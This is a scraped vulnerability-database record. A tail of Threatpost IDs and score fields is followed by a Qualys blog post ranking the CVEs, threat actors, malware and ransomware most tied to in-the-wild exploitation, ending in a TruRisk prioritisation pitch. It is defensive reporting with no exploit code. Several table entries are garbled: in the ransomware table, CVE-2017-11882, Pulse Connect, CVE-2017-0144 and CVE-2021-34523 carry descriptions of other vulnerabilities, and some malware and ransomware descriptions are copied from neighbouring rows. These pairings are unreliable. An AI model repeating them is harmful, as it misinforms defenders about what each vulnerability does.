"THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", 
"THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:9928E4032CF09647D7486B6AB9996982", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9982AC17285494A6CE329FC5C04DD84A", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A1DDB45DCB57F828DB4CF6A503E200DF", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", 
"THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:A9DA8692E05321571BBC81C64842178F", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", 
"THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B32C3B660376692DB4A20533491ED3C4", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5AADAB1C60C6F2AFCCBC532326ED087", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BA5C6FF88B9E93BE3E67B91264AD4549", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BBF9233468A677A95C5E9D149089804E", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", 
"THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "THREATPOST:C16A03D304D0ADC9CD38D3AC7B0F079A", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC15A784882157020D893E0B44732332", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", 
]}]}, "score": {"value": 10.8, "vector": "NONE"}, "vulnersScore": 10.8}, "_state": {"dependencies": 1696352655, "score": 1698858709}, "_internal": {"score_hash": "fb578904517f7c1f00062a74e891d8e1"}}
{"qualysblog": [{"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider's perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify the vulnerabilities most sought after by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures you can take to safeguard your organization from these vulnerabilities. \n\nSo, let's dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe've already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog - in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. Still, by 2023, the CISA team has its operation running like a well-oiled machine and is swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. 
\n\nSo, let's dive deep into understanding how quickly vulnerabilities get exploited in the wild, as disclosed by the National Vulnerability Database (NVD).\n\nThe following graph illustrates the average duration it takes to include a vulnerability in the Known Exploited Vulnerabilities (KEV) catalog from when it was published in NVD.\n\nFor those CVEs disclosed in 2023, the **time to KEV was just eight days**.\n\nFig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond to vulnerabilities. The only viable response is to use automation to patch these vulnerabilities before attackers can exploit them. Note that this is an average timeframe; in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought-after than others? If so, which ones?\n\nTo answer these questions, let's examine three main groups of attackers.\n\n * Threat Actor groups\n * Malware\n * Ransomware groups\n\nAlthough there is some overlap, each group appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. 
Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Threat Actor Count** | **TruRisk Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download a Visual Basic script containing PowerShell commands. Works reliably across a wide attack surface. Popular with [APT Groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office's default Equation Editor feature by tricking the user into opening a malicious file. This one is the favorite vulnerability of hacking groups, especially groups such as Cobalt, and of other malware, as you will see in the next section. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user into clicking a malicious link or opening a specially crafted malicious file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user into opening a specially crafted malicious file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server in its default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. 
Can be chained with other CVEs, CVE-2021-34523 and CVE-2021-31207, making it more attractive to cybercriminals. \nArbitrary file write vulnerability in Exchange | CVE-2021-27065 | 19 | 95 | Requires authentication; an authenticated attacker can then write arbitrary files on the Exchange server. Leveraged as part of the attack chain once an attacker has initial access. Exploited by the Hafnium group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. Can be chained with other CVEs, CVE-2021-34473 and CVE-2021-31207, making it more attractive to cybercriminals. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. Can be chained with other CVEs, CVE-2021-34473 and CVE-2021-31207, making it more attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s talk about some of the most active threat actors, those known to leverage the largest number of vulnerabilities in their arsenal to compromise systems across the globe.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor** | **CVEs Exploited** | **Description** \n---|---|--- \nEquation Group | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such malware is often challenging to detect and remove. \nFancy Bear | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. 
In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda | 30 | Also known as Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It's been observed to target the healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima | 24 | This is a sub-group of the Lazarus Group that has been attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment, part of the campaign that Novetta named Operation Blockbuster. \nStardust Chollima | 22 | Also known as BlueNoroff, it is a sub-group of the Lazarus Group, has been attributed to the Reconnaissance General Bureau, and targets banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider | 22 | Also known as Carbanak, FIN7, and Anunak, this is a financially motivated threat group that targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear | 20 | Also known as APT29, it often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37 | 20 | It is also linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n \nTable 2. 
Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s look at some of the vulnerabilities commonly exploited by malware.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVEs | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs most exploited by malware. In the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download a Visual Basic script containing PowerShell commands. Works reliably across a wide attack surface. Popular with APT Groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user into opening a malicious RTF file. Bypasses the patch for CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits a vulnerability in the Graphics Component, a fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits a vulnerability that was not patched by the fix for CVE-2017-11882. 
\nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Allows an unauthenticated user to run arbitrary commands on the Exchange server in its default configuration. Heavily exploited by the Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. Lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software apparently authenticated with a genuine digital signature. This essentially allows for the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. It can be chained with other CVEs, CVE-2021-34523 and CVE-2021-31207, making it more attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names known to exploit vulnerabilities to compromise systems.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVEs Count | Description \n---|---|--- \nHeuristic | 117 | Heuristic viruses can refer to malware detected by heuristic analysis or to the virus Heur.Invader, which compromises a device\u2019s security and antivirus measures. 
Some examples of heuristic viruses include adware and Trojans. \nWacatac | 94 | Also known as Trojan:Win32/Wacatac.B, this is a trojan horse designed to steal personal information, such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Pidief malware is a file infector that can infect executable files, such as .exe files, modifying the file so that it executes the Pidief malware. \nSkeeyah | 52 | Skeeyah malware is a file infector that can infect executable files, such as .exe files. It modifies the file so that the Skeeyah malware executes when the file is opened. \nBitrep | 49 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation and security malfunctions leading to unauthorized users gaining remote access. \nMeterpreter | 46 | Meterpreter is a malicious trojan-type program that allows cyber criminals to remotely control infected computers without writing anything to disk. This malware can log keystrokes, recording keyboard input (keys pressed) to steal credentials (logins, passwords) linked with various accounts and personal information. \nSwifi | 42 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation and security malfunctions leading to unauthorized users gaining remote access. \nIFrame | 38 | Iframes are used to inject malicious content into a website and can be spread through malicious websites that contain iframes with malicious content. \nLotoor | 35 | It can infect Android devices, often spread through malicious apps available on third-party app stores. These apps may appear to be legitimate, but they actually contain the Lotoor malware. 
\nRedirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information. \n \nTable 4. Most Active Malware for High-Risk Vulnerabilities\n\n## Top Ten Vulnerabilities Exploited by Ransomware\n\nLastly, let's examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering it inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has notably escalated.\n\nThe latest report on this escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat ransomware gang claimed responsibility. This same group alleges to be behind the data theft attack on Reddit.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Ransomware Count** | **TruRisk Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack. \nJava AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system by tricking the user into visiting a malicious link. Old CVE, but still relevant. 
\nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files, allowing the attacker to access private keys or user/password information, which is then used to gain further unauthorized access. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the Exchange server. It can be chained with other CVEs, CVE-2021-34523 and CVE-2021-31207, making it more attractive to cybercriminals. \nPulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. 
\nCitrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access. \n \nTable 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)Fig 7. Most Active Ransomware for High-Risk Vulnerabilities\n\n**Ransomware** | **CVEs** **Count** | **Description** \n---|---|--- \n**Conti** | 30 | "Conti" is a Ransomware-as-a-Service (RaaS) targeting corporations and agencies by stealing and threatening to publish their sensitive data unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption. \n**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones. \n**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim's computer with ransomware. \n**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. 
\n**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim's computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware. \n**STOP** | 15 | Its operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid. \n**Satan** | 15 | The ransom demanded by Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes. \n \nTable 6. Most Active Ransomware for High-Risk Vulnerabilities\n\n## Prioritizing Exploited Vulnerabilities with The Qualys VMDR and TruRisk\n\nMalicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. As such, keeping track of who is exploiting what can be daunting, and it's certainly not an efficient use of time for practitioners or security & risk management leaders.\n\nHence, **The Qualys VMDR with TruRisk** substantially simplifies the prioritization process by translating the risk associated with vulnerabilities, assets, and asset groups into an easily understandable score that both technical and non-technical teams can comprehend.\n\nWhen you observe carefully, each vulnerability mentioned above has a TruRisk Score (QVS) of over 90. TruRisk considers these factors daily, consistently assigning a score higher than 90.\n\nSo, from a prioritization standpoint, any issue with a score of 90 or above should be immediately prioritized and remedied.\n\nLet\u2019s take CVE-2017-11882 as an example. 
